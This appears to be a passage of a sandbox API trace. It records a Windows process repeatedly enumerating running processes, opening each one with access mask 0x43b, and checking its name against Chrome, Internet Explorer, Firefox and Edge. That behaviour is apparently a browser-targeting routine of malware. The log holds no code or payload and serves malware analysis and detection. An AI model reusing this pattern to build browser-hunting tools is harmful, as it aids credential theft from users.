	[0252.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.542] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa668
	[0252.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.543] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.544] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.544] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.544] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa66c
	[0252.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.545] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.546] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.546] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.546] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.547] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa670
	[0252.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.548] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.548] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.548] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.548] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0252.549] CloseHandle (hObject=0x4fd0) returned 1
	[0252.549] Sleep (dwMilliseconds=0x64) 
	[0252.646] GetCurrentProcessId () returned 0x110
	[0252.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0252.651] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0252.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0252.653] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0252.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa674
	[0252.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.654] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.654] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.654] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.655] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa678
	[0252.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.656] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.656] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.656] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.657] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0252.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa67c
	[0252.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.658] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0252.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.659] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.659] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0252.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.659] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.660] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa680
	[0252.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.661] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.661] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.661] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.662] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0252.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa684
	[0252.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.663] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0252.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.663] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.664] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0252.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.664] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0252.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa688
	[0252.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.666] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0252.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.666] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.666] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0252.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.667] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0252.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa68c
	[0252.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.668] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0252.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.668] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.668] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0252.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.669] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0252.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa690
	[0252.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.670] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.670] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.670] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.671] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa694
	[0252.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.672] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.672] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.672] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.673] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa698
	[0252.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.674] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.674] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.675] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.675] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.676] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa69c
	[0252.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.677] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.677] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.678] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.678] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa6a0
	[0252.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.679] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.680] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa6a4
	[0252.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.681] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.682] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.682] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.682] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.682] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa6a8
	[0252.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.683] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.684] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.684] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.684] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa6ac
	[0252.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.685] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.686] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.686] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.686] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0252.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa6b0
	[0252.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.688] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0252.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.688] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.688] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0252.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.688] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa6b4
	[0252.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.690] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.690] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.691] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.691] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0252.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa6b8
	[0252.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.692] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.692] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.693] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.693] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa6bc
	[0252.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.694] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.695] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.695] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.695] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa6c0
	[0252.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.696] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.697] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.697] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.697] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa6c4
	[0252.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.698] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.699] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
